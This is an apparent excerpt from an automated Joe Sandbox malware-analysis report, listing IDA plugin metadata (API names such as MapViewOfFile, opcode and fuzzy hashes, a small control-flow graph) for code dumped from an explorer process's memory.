                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_aba000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                                              • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                                                                              • Instruction ID: 29d3467dbcf0f49e2e8cdf5c70eaafd8558553910dd55ac3f6d154cf172454aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351583267491D4ACB34AB389C842F4B7D9F755325B58072AC49BC3287E7A9C84683A2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 110 ab1bf8-ab1c18 OpenFileMappingA 111 ab1c3b-ab1c48 110->111 112 ab1c1a-ab1c38 MapViewOfFile 110->112 112->111
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                                              • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                                                                              • Instruction ID: 6496b011b2a6339773023a097afebb1fd5a8a6cf580366f400d38abe7480b64e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F01234314F4D4FAB45EF7C9C9C136B7E1EBA8202744857A985AC6165EF34C8458711